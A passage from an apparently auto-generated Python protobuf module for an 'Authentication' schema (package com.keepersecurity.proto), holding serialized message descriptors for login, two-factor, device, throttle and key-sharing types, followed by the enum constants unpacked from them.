\x01(\x0c\x12\x0f\n\x07\x63ommand\x18\x02 \x01(\t\x12\x10\n\x08username\x18\x03 \x01(\t\"M\n\x11GlobalUserAccount\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x12\n\naccountUid\x18\x02 \x01(\x0c\x12\x12\n\nregionName\x18\x03 \x01(\t\"7\n\x0f\x41\x63\x63ountUsername\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x12\n\ndateActive\x18\x02 \x01(\t\"P\n\x19SsoServiceProviderRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x0e\n\x06locale\x18\x03 \x01(\t\"a\n\x1aSsoServiceProviderResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05spUrl\x18\x02 \x01(\t\x12\x0f\n\x07isCloud\x18\x03 \x01(\x08\x12\x15\n\rclientVersion\x18\x04 \x01(\t\"4\n\x12UserSettingRequest\x12\x0f\n\x07setting\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\"f\n\rThrottleState\x12*\n\x04type\x18\x01 \x01(\x0e\x32\x1c.Authentication.ThrottleType\x12\x0b\n\x03key\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\x08\"\xb5\x01\n\x0eThrottleState2\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x16\n\x0ekeyDescription\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\x12\x18\n\x10valueDescription\x18\x04 \x01(\t\x12\x12\n\nidentifier\x18\x05 \x01(\t\x12\x0e\n\x06locked\x18\x06 \x01(\x08\x12\x1a\n\x12includedInAllClear\x18\x07 \x01(\x08\x12\x15\n\rexpireSeconds\x18\x08 \x01(\x05\"\x97\x01\n\x11\x44\x65viceInformation\x12\x10\n\x08\x64\x65viceId\x18\x01 \x01(\x03\x12\x12\n\ndeviceName\x18\x02 \x01(\t\x12\x15\n\rclientVersion\x18\x03 \x01(\t\x12\x11\n\tlastLogin\x18\x04 \x01(\x03\x12\x32\n\x0c\x64\x65viceStatus\x18\x05 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"*\n\x0bUserSetting\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x08\".\n\x12UserDataKeyRequest\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x03(\x03\"Q\n\x1b\x45nterpriseUserIdDataKeyPair\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\x18\n\x10\x65ncryptedDataKey\x18\x02 \x01(\x0c\"\x95\x01\n\x0bUserDataKey\x12\x0e\n\x06roleId\x18\x01 \x01(\x03\x12\x0f\n\x07roleKey\x18\x02 \x01(\x0c\x12\x12\n\nprivateKey\x18\x03 \x01(\t\x12Q\n\x1c\x65nterpriseUserIdDataKeyPairs\x18\x04 \x03(\x0b\x32+.Authentication.EnterpriseUserIdDataKeyPair\"z\n\x13UserDataKeyResponse\x12\x31\n\x0cuserDataKeys\x18\x01 \x03(\x0b\x32\x1b.Authentication.UserDataKey\x12\x14\n\x0c\x61\x63\x63\x65ssDenied\x18\x02 \x03(\x03\x12\x1a\n\x12noEncryptedDataKey\x18\x03 \x03(\x03\"H\n)MasterPasswordRecoveryVerificationRequest\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\"U\n\x1cGetSecurityQuestionV3Request\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x18\n\x10verificationCode\x18\x02 \x01(\t\"r\n\x1dGetSecurityQuestionV3Response\x12\x18\n\x10securityQuestion\x18\x01 \x01(\t\x12\x15\n\rbackupKeyDate\x18\x02 \x01(\x03\x12\x0c\n\x04salt\x18\x03 \x01(\x0c\x12\x12\n\niterations\x18\x04 \x01(\x05\"n\n\x19GetDataKeyBackupV3Request\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x18\n\x10verificationCode\x18\x02 \x01(\t\x12\x1a\n\x12securityAnswerHash\x18\x03 \x01(\x0c\"v\n\rPasswordRules\x12\x10\n\x08ruleType\x18\x01 \x01(\t\x12\r\n\x05match\x18\x02 \x01(\x08\x12\x0f\n\x07pattern\x18\x03 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t\x12\x0f\n\x07minimum\x18\x05 \x01(\x05\x12\r\n\x05value\x18\x06 \x01(\t\"\xa3\x02\n\x1aGetDataKeyBackupV3Response\x12\x15\n\rdataKeyBackup\x18\x01 \x01(\x0c\x12\x19\n\x11\x64\x61taKeyBackupDate\x18\x02 \x01(\x03\x12\x11\n\tpublicKey\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x04 \x01(\x0c\x12\x11\n\tclientKey\x18\x05 \x01(\x0c\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x06 \x01(\x0c\x12\x34\n\rpasswordRules\x18\x07 \x03(\x0b\x32\x1d.Authentication.PasswordRules\x12\x1a\n\x12passwordRulesIntro\x18\x08 \x01(\t\x12\x1f\n\x17minimumPbkdf2Iterations\x18\t \x01(\x05\")\n\x14GetPublicKeysRequest\x12\x11\n\tusernames\x18\x01 \x03(\t\"r\n\x11PublicKeyResponse\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x11\n\tpublicKey\x18\x02 \x01(\x0c\x12\x14\n\x0cpublicEccKey\x18\x03 \x01(\x0c\x12\x0f\n\x07message\x18\x04 \x01(\t\x12\x11\n\terrorCode\x18\x05 \x01(\t\"P\n\x15GetPublicKeysResponse\x12\x37\n\x0ckeyResponses\x18\x01 \x03(\x0b\x32!.Authentication.PublicKeyResponse\"F\n\x14SetEccKeyPairRequest\x12\x11\n\tpublicKey\x18\x01 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x02 \x01(\x0c\"X\n\x13\x41\x64\x64\x41ppSharesRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12+\n\x06shares\x18\x02 \x03(\x0b\x32\x1b.Authentication.AppShareAdd\">\n\x16RemoveAppSharesRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x0e\n\x06shares\x18\x02 \x03(\x0c\"\x87\x01\n\x0b\x41ppShareAdd\x12\x11\n\tsecretUid\x18\x02 \x01(\x0c\x12\x37\n\tshareType\x18\x03 \x01(\x0e\x32$.Authentication.ApplicationShareType\x12\x1a\n\x12\x65ncryptedSecretKey\x18\x04 \x01(\x0c\x12\x10\n\x08\x65\x64itable\x18\x05 \x01(\x08\"{\n\x08\x41ppShare\x12\x11\n\tsecretUid\x18\x01 \x01(\x0c\x12\x37\n\tshareType\x18\x02 \x01(\x0e\x32$.Authentication.ApplicationShareType\x12\x10\n\x08\x65\x64itable\x18\x03 \x01(\x08\x12\x11\n\tcreatedOn\x18\x04 \x01(\x03\"\xa7\x01\n\x13\x41\x64\x64\x41ppClientRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x17\n\x0f\x65ncryptedAppKey\x18\x02 \x01(\x0c\x12\x10\n\x08\x63lientId\x18\x03 \x01(\x0c\x12\x0e\n\x06lockIp\x18\x04 \x01(\x08\x12\x1b\n\x13\x66irstAccessExpireOn\x18\x05 \x01(\x03\x12\x16\n\x0e\x61\x63\x63\x65ssExpireOn\x18\x06 \x01(\x03\x12\n\n\x02id\x18\x07 \x01(\t\"@\n\x17RemoveAppClientsRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x0f\n\x07\x63lients\x18\x02 \x03(\x0c\"~\n\x17\x41\x64\x64\x45xternalShareRequest\x12\x11\n\trecordUid\x18\x01 \x01(\x0c\x12\x1a\n\x12\x65ncryptedRecordKey\x18\x02 \x01(\x0c\x12\x10\n\x08\x63lientId\x18\x03 \x01(\x0c\x12\x16\n\x0e\x61\x63\x63\x65ssExpireOn\x18\x04 \x01(\x03\x12\n\n\x02id\x18\x05 \x01(\t\"\xd0\x01\n\tAppClient\x12\n\n\x02id\x18\x01 \x01(\t\x12\x10\n\x08\x63lientId\x18\x02 \x01(\x0c\x12\x11\n\tcreatedOn\x18\x03 \x01(\x03\x12\x13\n\x0b\x66irstAccess\x18\x04 \x01(\x03\x12\x12\n\nlastAccess\x18\x05 \x01(\x03\x12\x11\n\tpublicKey\x18\x06 \x01(\x0c\x12\x0e\n\x06lockIp\x18\x07 \x01(\x08\x12\x11\n\tipAddress\x18\x08 \x01(\t\x12\x1b\n\x13\x66irstAccessExpireOn\x18\t \x01(\x03\x12\x16\n\x0e\x61\x63\x63\x65ssExpireOn\x18\n \x01(\x03\")\n\x11GetAppInfoRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x03(\x0c\"\x8e\x01\n\x07\x41ppInfo\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12(\n\x06shares\x18\x02 \x03(\x0b\x32\x18.Authentication.AppShare\x12*\n\x07\x63lients\x18\x03 \x03(\x0b\x32\x19.Authentication.AppClient\x12\x17\n\x0fisExternalShare\x18\x04 \x01(\x08\">\n\x12GetAppInfoResponse\x12(\n\x07\x61ppInfo\x18\x01 \x03(\x0b\x32\x17.Authentication.AppInfo\"\xb2\x01\n\x12\x41pplicationSummary\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x12\n\nlastAccess\x18\x02 \x01(\x03\x12\x14\n\x0crecordShares\x18\x03 \x01(\x05\x12\x14\n\x0c\x66olderShares\x18\x04 \x01(\x05\x12\x15\n\rfolderRecords\x18\x05 \x01(\x05\x12\x13\n\x0b\x63lientCount\x18\x06 \x01(\x05\x12\x1a\n\x12\x65xpiredClientCount\x18\x07 \x01(\x05\"`\n\x1eGetApplicationsSummaryResponse\x12>\n\x12\x61pplicationSummary\x18\x01 \x03(\x0b\x32\".Authentication.ApplicationSummary\"/\n\x1bGetVerificationTokenRequest\x12\x10\n\x08username\x18\x01 \x01(\t\"B\n\x1cGetVerificationTokenResponse\x12\"\n\x1a\x65ncryptedVerificationToken\x18\x01 \x01(\x0c\"\'\n\x16SendShareInviteRequest\x12\r\n\x05\x65mail\x18\x01 \x01(\t\"\xc5\x01\n\x18TimeLimitedAccessRequest\x12\x12\n\naccountUid\x18\x01 \x03(\x0c\x12\x0f\n\x07teamUid\x18\x02 \x03(\x0c\x12\x11\n\trecordUid\x18\x03 \x03(\x0c\x12\x17\n\x0fsharedObjectUid\x18\x04 \x01(\x0c\x12\x44\n\x15timeLimitedAccessType\x18\x05 \x01(\x0e\x32%.Authentication.TimeLimitedAccessType\x12\x12\n\nexpiration\x18\x06 \x01(\x03\"-\n\x19TimeLimitedAccessResponse\x12\x10\n\x08revision\x18\x01 \x01(\x03\"+\n\x16RequestDownloadRequest\x12\x11\n\tfileNames\x18\x01 \x03(\t\"g\n\x17RequestDownloadResponse\x12\x0e\n\x06result\x18\x01 \x01(\t\x12\x0f\n\x07message\x18\x02 \x01(\t\x12+\n\tdownloads\x18\x03 \x03(\x0b\x32\x18.Authentication.Download\"D\n\x08\x44ownload\x12\x10\n\x08\x66ileName\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x12\x19\n\x11successStatusCode\x18\x03 \x01(\x05\"#\n\x11\x44\x65leteUserRequest\x12\x0e\n\x06reason\x18\x01 \x01(\t*\xb9\x02\n\x11SupportedLanguage\x12\x0b\n\x07\x45NGLISH\x10\x00\x12\n\n\x06\x41RABIC\x10\x01\x12\x0b\n\x07\x42RITISH\x10\x02\x12\x0b\n\x07\x43HINESE\x10\x03\x12\x15\n\x11\x43HINESE_HONG_KONG\x10\x04\x12\x12\n\x0e\x43HINESE_TAIWAN\x10\x05\x12\t\n\x05\x44UTCH\x10\x06\x12\n\n\x06\x46RENCH\x10\x07\x12\n\n\x06GERMAN\x10\x08\x12\t\n\x05GREEK\x10\t\x12\n\n\x06HEBREW\x10\n\x12\x0b\n\x07ITALIAN\x10\x0b\x12\x0c\n\x08JAPANESE\x10\x0c\x12\n\n\x06KOREAN\x10\r\x12\n\n\x06POLISH\x10\x0e\x12\x0e\n\nPORTUGUESE\x10\x0f\x12\x15\n\x11PORTUGUESE_BRAZIL\x10\x10\x12\x0c\n\x08ROMANIAN\x10\x11\x12\x0b\n\x07RUSSIAN\x10\x12\x12\n\n\x06SLOVAK\x10\x13\x12\x0b\n\x07SPANISH\x10\x14*Z\n\tLoginType\x12\n\n\x06NORMAL\x10\x00\x12\x07\n\x03SSO\x10\x01\x12\x07\n\x03\x42IO\x10\x02\x12\r\n\tALTERNATE\x10\x03\x12\x0b\n\x07OFFLINE\x10\x04\x12\x13\n\x0f\x46ORGOT_PASSWORD\x10\x05*q\n\x0c\x44\x65viceStatus\x12\x19\n\x15\x44\x45VICE_NEEDS_APPROVAL\x10\x00\x12\r\n\tDEVICE_OK\x10\x01\x12\x1b\n\x17\x44\x45VICE_DISABLED_BY_USER\x10\x02\x12\x1a\n\x16\x44\x45VICE_LOCKED_BY_ADMIN\x10\x03*A\n\rLicenseStatus\x12\t\n\x05OTHER\x10\x00\x12\n\n\x06\x41\x43TIVE\x10\x01\x12\x0b\n\x07\x45XPIRED\x10\x02\x12\x0c\n\x08\x44ISABLED\x10\x03*7\n\x0b\x41\x63\x63ountType\x12\x0c\n\x08\x43ONSUMER\x10\x00\x12\n\n\x06\x46\x41MILY\x10\x01\x12\x0e\n\nENTERPRISE\x10\x02*\xcc\x01\n\x10SessionTokenType\x12\x12\n\x0eNO_RESTRICTION\x10\x00\x12\x14\n\x10\x41\x43\x43OUNT_RECOVERY\x10\x01\x12\x11\n\rSHARE_ACCOUNT\x10\x02\x12\x0c\n\x08PURCHASE\x10\x03\x12\x0c\n\x08RESTRICT\x10\x04\x12\x11\n\rACCEPT_INVITE\x10\x05\x12\x12\n\x0eSUPPORT_SERVER\x10\x06\x12\x17\n\x13\x45NTERPRISE_CREATION\x10\x07\x12\x1f\n\x1b\x45XPIRED_BUT_ALLOWED_TO_SYNC\x10\x08*G\n\x07Version\x12\x13\n\x0finvalid_version\x10\x00\x12\x13\n\x0f\x64\x65\x66\x61ult_version\x10\x01\x12\x12\n\x0esecond_version\x10\x02*7\n\x1fMasterPasswordReentryActionType\x12\n\n\x06UNMASK\x10\x00\x12\x08\n\x04\x43OPY\x10\x01*l\n\x0bLoginMethod\x12\x17\n\x13INVALID_LOGINMETHOD\x10\x00\x12\x14\n\x10\x45XISTING_ACCOUNT\x10\x01\x12\x0e\n\nSSO_DOMAIN\x10\x02\x12\r\n\tAFTER_SSO\x10\x03\x12\x0f\n\x0bNEW_ACCOUNT\x10\x04*\xc7\x03\n\nLoginState\x12\x16\n\x12INVALID_LOGINSTATE\x10\x00\x12\x0e\n\nLOGGED_OUT\x10\x01\x12\x1c\n\x18\x44\x45VICE_APPROVAL_REQUIRED\x10\x02\x12\x11\n\rDEVICE_LOCKED\x10\x03\x12\x12\n\x0e\x41\x43\x43OUNT_LOCKED\x10\x04\x12\x19\n\x15\x44\x45VICE_ACCOUNT_LOCKED\x10\x05\x12\x0b\n\x07UPGRADE\x10\x06\x12\x13\n\x0fLICENSE_EXPIRED\x10\x07\x12\x13\n\x0fREGION_REDIRECT\x10\x08\x12\x16\n\x12REDIRECT_CLOUD_SSO\x10\t\x12\x17\n\x13REDIRECT_ONSITE_SSO\x10\n\x12\x10\n\x0cREQUIRES_2FA\x10\x0c\x12\x16\n\x12REQUIRES_AUTH_HASH\x10\r\x12\x15\n\x11REQUIRES_USERNAME\x10\x0e\x12\x19\n\x15\x41\x46TER_CLOUD_SSO_LOGIN\x10\x0f\x12\x1d\n\x19REQUIRES_ACCOUNT_CREATION\x10\x10\x12&\n\"REQUIRES_DEVICE_ENCRYPTED_DATA_KEY\x10\x11\x12\x17\n\x13LOGIN_TOKEN_EXPIRED\x10\x12\x12\r\n\tLOGGED_IN\x10\x63*k\n\x14\x45ncryptedDataKeyType\x12\n\n\x06NO_KEY\x10\x00\x12\x18\n\x14\x42Y_DEVICE_PUBLIC_KEY\x10\x01\x12\x0f\n\x0b\x42Y_PASSWORD\x10\x02\x12\x10\n\x0c\x42Y_ALTERNATE\x10\x03\x12\n\n\x06\x42Y_BIO\x10\x04*-\n\x0ePasswordMethod\x12\x0b\n\x07\x45NTERED\x10\x00\x12\x0e\n\nBIOMETRICS\x10\x01*\xb9\x01\n\x11TwoFactorPushType\x12\x14\n\x10TWO_FA_PUSH_NONE\x10\x00\x12\x13\n\x0fTWO_FA_PUSH_SMS\x10\x01\x12\x16\n\x12TWO_FA_PUSH_KEEPER\x10\x02\x12\x18\n\x14TWO_FA_PUSH_DUO_PUSH\x10\x03\x12\x18\n\x14TWO_FA_PUSH_DUO_TEXT\x10\x04\x12\x18\n\x14TWO_FA_PUSH_DUO_CALL\x10\x05\x12\x13\n\x0fTWO_FA_PUSH_DNA\x10\x06*\xc3\x01\n\x12TwoFactorValueType\x12\x14\n\x10TWO_FA_CODE_NONE\x10\x00\x12\x14\n\x10TWO_FA_CODE_TOTP\x10\x01\x12\x13\n\x0fTWO_FA_CODE_SMS\x10\x02\x12\x13\n\x0fTWO_FA_CODE_DUO\x10\x03\x12\x13\n\x0fTWO_FA_CODE_RSA\x10\x04\x12\x13\n\x0fTWO_FA_RESP_U2F\x10\x05\x12\x18\n\x14TWO_FA_RESP_WEBAUTHN\x10\x06\x12\x13\n\x0fTWO_FA_CODE_DNA\x10\x07*\xe1\x01\n\x14TwoFactorChannelType\x12\x12\n\x0eTWO_FA_CT_NONE\x10\x00\x12\x12\n\x0eTWO_FA_CT_TOTP\x10\x01\x12\x11\n\rTWO_FA_CT_SMS\x10\x02\x12\x11\n\rTWO_FA_CT_DUO\x10\x03\x12\x11\n\rTWO_FA_CT_RSA\x10\x04\x12\x14\n\x10TWO_FA_CT_BACKUP\x10\x05\x12\x11\n\rTWO_FA_CT_U2F\x10\x06\x12\x16\n\x12TWO_FA_CT_WEBAUTHN\x10\x07\x12\x14\n\x10TWO_FA_CT_KEEPER\x10\x08\x12\x11\n\rTWO_FA_CT_DNA\x10\t*\xab\x01\n\x13TwoFactorExpiration\x12\x1a\n\x16TWO_FA_EXP_IMMEDIATELY\x10\x00\x12\x18\n\x14TWO_FA_EXP_5_MINUTES\x10\x01\x12\x17\n\x13TWO_FA_EXP_12_HOURS\x10\x02\x12\x17\n\x13TWO_FA_EXP_24_HOURS\x10\x03\x12\x16\n\x12TWO_FA_EXP_30_DAYS\x10\x04\x12\x14\n\x10TWO_FA_EXP_NEVER\x10\x05*@\n\x0bLicenseType\x12\t\n\x05VAULT\x10\x00\x12\x08\n\x04\x43HAT\x10\x01\x12\x0b\n\x07STORAGE\x10\x02\x12\x0f\n\x0b\x42REACHWATCH\x10\x03*i\n\x0bObjectTypes\x12\n\n\x06RECORD\x10\x00\x12\x16\n\x12SHARED_FOLDER_USER\x10\x01\x12\x16\n\x12SHARED_FOLDER_TEAM\x10\x02\x12\x0f\n\x0bUSER_FOLDER\x10\x03\x12\r\n\tTEAM_USER\x10\x04*`\n\x1b\x41lternateAuthenticationType\x12\x1d\n\x19\x41LTERNATE_MASTER_PASSWORD\x10\x00\x12\r\n\tBIOMETRIC\x10\x01\x12\x13\n\x0f\x41\x43\x43OUNT_RECOVER\x10\x02*\x9a\x02\n\x0cThrottleType\x12\x1b\n\x17PASSWORD_RETRY_THROTTLE\x10\x00\x12\"\n\x1ePASSWORD_RETRY_LEGACY_THROTTLE\x10\x01\x12\x13\n\x0fTWO_FA_THROTTLE\x10\x02\x12\x1a\n\x16TWO_FA_LEGACY_THROTTLE\x10\x03\x12\x15\n\x11QA_RETRY_THROTTLE\x10\x04\x12\x1c\n\x18\x41\x43\x43OUNT_RECOVER_THROTTLE\x10\x05\x12.\n*VALIDATE_DEVICE_VERIFICATION_CODE_THROTTLE\x10\x06\x12\x33\n/VALIDATE_CREATE_USER_VERIFICATION_CODE_THROTTLE\x10\x07*8\n\x06Region\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x06\n\x02\x65u\x10\x01\x12\x06\n\x02us\x10\x02\x12\t\n\x05usgov\x10\x03\x12\x06\n\x02\x61u\x10\x04*D\n\x14\x41pplicationShareType\x12\x15\n\x11SHARE_TYPE_RECORD\x10\x00\x12\x15\n\x11SHARE_TYPE_FOLDER\x10\x01*\xa4\x01\n\x15TimeLimitedAccessType\x12$\n INVALID_TIME_LIMITED_ACCESS_TYPE\x10\x00\x12\x19\n\x15USER_ACCESS_TO_RECORD\x10\x01\x12\'\n#USER_OR_TEAM_ACCESS_TO_SHAREDFOLDER\x10\x02\x12!\n\x1dRECORD_ACCESS_TO_SHAREDFOLDER\x10\x03\x42*\n\x18\x63om.keepersecurity.protoB\x0e\x41uthenticationb\x06proto3')
_SUPPORTEDLANGUAGE = DESCRIPTOR.enum_types_by_name['SupportedLanguage']
SupportedLanguage = enum_type_wrapper.EnumTypeWrapper(_SUPPORTEDLANGUAGE)
_LOGINTYPE = DESCRIPTOR.enum_types_by_name['LoginType']
LoginType = enum_type_wrapper.EnumTypeWrapper(_LOGINTYPE)
_DEVICESTATUS = DESCRIPTOR.enum_types_by_name['DeviceStatus']
DeviceStatus = enum_type_wrapper.EnumTypeWrapper(_DEVICESTATUS)
_LICENSESTATUS = DESCRIPTOR.enum_types_by_name['LicenseStatus']
LicenseStatus = enum_type_wrapper.EnumTypeWrapper(_LICENSESTATUS)
_ACCOUNTTYPE = DESCRIPTOR.enum_types_by_name['AccountType']
AccountType = enum_type_wrapper.EnumTypeWrapper(_ACCOUNTTYPE)
_SESSIONTOKENTYPE = DESCRIPTOR.enum_types_by_name['SessionTokenType']
SessionTokenType = enum_type_wrapper.EnumTypeWrapper(_SESSIONTOKENTYPE)
_VERSION = DESCRIPTOR.enum_types_by_name['Version']
Version = enum_type_wrapper.EnumTypeWrapper(_VERSION)
_MASTERPASSWORDREENTRYACTIONTYPE = DESCRIPTOR.enum_types_by_name['MasterPasswordReentryActionType']
MasterPasswordReentryActionType = enum_type_wrapper.EnumTypeWrapper(_MASTERPASSWORDREENTRYACTIONTYPE)
_LOGINMETHOD = DESCRIPTOR.enum_types_by_name['LoginMethod']
LoginMethod = enum_type_wrapper.EnumTypeWrapper(_LOGINMETHOD)
_LOGINSTATE = DESCRIPTOR.enum_types_by_name['LoginState']
LoginState = enum_type_wrapper.EnumTypeWrapper(_LOGINSTATE)
_ENCRYPTEDDATAKEYTYPE = DESCRIPTOR.enum_types_by_name['EncryptedDataKeyType']
EncryptedDataKeyType = enum_type_wrapper.EnumTypeWrapper(_ENCRYPTEDDATAKEYTYPE)
_PASSWORDMETHOD = DESCRIPTOR.enum_types_by_name['PasswordMethod']
PasswordMethod = enum_type_wrapper.EnumTypeWrapper(_PASSWORDMETHOD)
_TWOFACTORPUSHTYPE = DESCRIPTOR.enum_types_by_name['TwoFactorPushType']
TwoFactorPushType = enum_type_wrapper.EnumTypeWrapper(_TWOFACTORPUSHTYPE)
_TWOFACTORVALUETYPE = DESCRIPTOR.enum_types_by_name['TwoFactorValueType']
TwoFactorValueType = enum_type_wrapper.EnumTypeWrapper(_TWOFACTORVALUETYPE)
_TWOFACTORCHANNELTYPE = DESCRIPTOR.enum_types_by_name['TwoFactorChannelType']
TwoFactorChannelType = enum_type_wrapper.EnumTypeWrapper(_TWOFACTORCHANNELTYPE)
_TWOFACTOREXPIRATION = DESCRIPTOR.enum_types_by_name['TwoFactorExpiration']
TwoFactorExpiration = enum_type_wrapper.EnumTypeWrapper(_TWOFACTOREXPIRATION)
_LICENSETYPE = DESCRIPTOR.enum_types_by_name['LicenseType']
LicenseType = enum_type_wrapper.EnumTypeWrapper(_LICENSETYPE)
_OBJECTTYPES = DESCRIPTOR.enum_types_by_name['ObjectTypes']
ObjectTypes = enum_type_wrapper.EnumTypeWrapper(_OBJECTTYPES)
_ALTERNATEAUTHENTICATIONTYPE = DESCRIPTOR.enum_types_by_name['AlternateAuthenticationType']
AlternateAuthenticationType = enum_type_wrapper.EnumTypeWrapper(_ALTERNATEAUTHENTICATIONTYPE)
_THROTTLETYPE = DESCRIPTOR.enum_types_by_name['ThrottleType']
ThrottleType = enum_type_wrapper.EnumTypeWrapper(_THROTTLETYPE)
_REGION = DESCRIPTOR.enum_types_by_name['Region']
Region = enum_type_wrapper.EnumTypeWrapper(_REGION)
_APPLICATIONSHARETYPE = DESCRIPTOR.enum_types_by_name['ApplicationShareType']
ApplicationShareType = enum_type_wrapper.EnumTypeWrapper(_APPLICATIONSHARETYPE)
_TIMELIMITEDACCESSTYPE = DESCRIPTOR.enum_types_by_name['TimeLimitedAccessType']
TimeLimitedAccessType = enum_type_wrapper.EnumTypeWrapper(_TIMELIMITEDACCESSTYPE)
ENGLISH = 0
ARABIC = 1
BRITISH = 2
CHINESE = 3
CHINESE_HONG_KONG = 4
CHINESE_TAIWAN = 5
DUTCH = 6
FRENCH = 7
GERMAN = 8
GREEK = 9
HEBREW = 10
ITALIAN = 11
JAPANESE = 12
KOREAN = 13
POLISH = 14
PORTUGUESE = 15
PORTUGUESE_BRAZIL = 16
ROMANIAN = 17
RUSSIAN = 18
SLOVAK = 19
SPANISH = 20
NORMAL = 0
SSO = 1
BIO = 2
ALTERNATE = 3
OFFLINE = 4
FORGOT_PASSWORD = 5
DEVICE_NEEDS_APPROVAL = 0
DEVICE_OK = 1
DEVICE_DISABLED_BY_USER = 2
DEVICE_LOCKED_BY_ADMIN = 3
OTHER = 0
ACTIVE = 1
EXPIRED = 2
DISABLED = 3
CONSUMER = 0
FAMILY = 1
ENTERPRISE = 2
NO_RESTRICTION = 0
ACCOUNT_RECOVERY = 1
SHARE_ACCOUNT = 2
PURCHASE = 3
RESTRICT = 4
ACCEPT_INVITE = 5
SUPPORT_SERVER = 6
ENTERPRISE_CREATION = 7
EXPIRED_BUT_ALLOWED_TO_SYNC = 8
invalid_version = 0
default_version = 1
second_version = 2
UNMASK = 0
COPY = 1
INVALID_LOGINMETHOD = 0
EXISTING_ACCOUNT = 1
SSO_DOMAIN = 2
AFTER_SSO = 3
NEW_ACCOUNT = 4
INVALID_LOGINSTATE = 0
LOGGED_OUT = 1
DEVICE_APPROVAL_REQUIRED = 2
DEVICE_LOCKED = 3
ACCOUNT_LOCKED = 4
DEVICE_ACCOUNT_LOCKED = 5
UPGRADE = 6
LICENSE_EXPIRED = 7
REGION_REDIRECT = 8
REDIRECT_CLOUD_SSO = 9
REDIRECT_ONSITE_SSO = 10
REQUIRES_2FA = 12
REQUIRES_AUTH_HASH = 13
REQUIRES_USERNAME = 14
AFTER_CLOUD_SSO_LOGIN = 15
REQUIRES_ACCOUNT_CREATION = 16
REQUIRES_DEVICE_ENCRYPTED_DATA_KEY = 17
LOGIN_TOKEN_EXPIRED = 18
LOGGED_IN = 99
NO_KEY = 0
BY_DEVICE_PUBLIC_KEY = 1
BY_PASSWORD = 2
BY_ALTERNATE = 3
BY_BIO = 4
ENTERED = 0
BIOMETRICS = 1
TWO_FA_PUSH_NONE = 0
TWO_FA_PUSH_SMS = 1
TWO_FA_PUSH_KEEPER = 2
TWO_FA_PUSH_DUO_PUSH = 3
TWO_FA_PUSH_DUO_TEXT = 4
TWO_FA_PUSH_DUO_CALL = 5
TWO_FA_PUSH_DNA = 6
TWO_FA_CODE_NONE = 0
TWO_FA_CODE_TOTP = 1
TWO_FA_CODE_SMS = 2
TWO_FA_CODE_DUO = 3
TWO_FA_CODE_RSA = 4
TWO_FA_RESP_U2F = 5
TWO_FA_RESP_WEBAUTHN = 6
TWO_FA_CODE_DNA = 7
TWO_FA_CT_NONE = 0
TWO_FA_CT_TOTP = 1
TWO_FA_CT_SMS = 2
TWO_FA_CT_DUO = 3
TWO_FA_CT_RSA = 4
TWO_FA_CT_BACKUP = 5
TWO_FA_CT_U2F = 6
TWO_FA_CT_WEBAUTHN = 7
TWO_FA_CT_KEEPER = 8
TWO_FA_CT_DNA = 9
TWO_FA_EXP_IMMEDIATELY = 0
TWO_FA_EXP_5_MINUTES = 1
TWO_FA_EXP_12_HOURS = 2
TWO_FA_EXP_24_HOURS = 3
TWO_FA_EXP_30_DAYS = 4
TWO_FA_EXP_NEVER = 5
VAULT = 0
CHAT = 1
STORAGE = 2
BREACHWATCH = 3
RECORD = 0
SHARED_FOLDER_USER = 1
SHARED_FOLDER_TEAM = 2
USER_FOLDER = 3
TEAM_USER = 4
ALTERNATE_MASTER_PASSWORD = 0
BIOMETRIC = 1
ACCOUNT_RECOVER = 2
PASSWORD_RETRY_THROTTLE = 0
PASSWORD_RETRY_LEGACY_THROTTLE = 1
TWO_FA_THROTTLE = 2
TWO_FA_LEGACY_THROTTLE = 3
QA_RETRY_THROTTLE = 4
ACCOUNT_RECOVER_THROTTLE = 5
VALIDATE_DEVICE_VERIFICATION_CODE_THROTTLE = 6
VALIDATE_CREATE_USER_VERIFICATION_CODE_THROTTLE = 7
UNKNOWN = 0
eu = 1
us = 2
usgov = 3
au = 4
SHARE_TYPE_RECORD = 0
SHARE_TYPE_FOLDER = 1
INVALID_TIME_LIMITED_ACCESS_TYPE = 0
USER_ACCESS_TO_RECORD = 1
USER_OR_TEAM_ACCESS_TO_SHAREDFOLDER = 2
RECORD_ACCESS_TO_SHAREDFOLDER = 3
_APIREQUEST = DESCRIPTOR.message_types_by_name['ApiRequest']
_APIREQUESTPAYLOAD = DESCRIPTOR.message_types_by_name['ApiRequestPayload']
_TRANSFORM = DESCRIPTOR.message_types_by_name['Transform']
_DEVICEREQUEST = DESCRIPTOR.message_types_by_name['DeviceRequest']
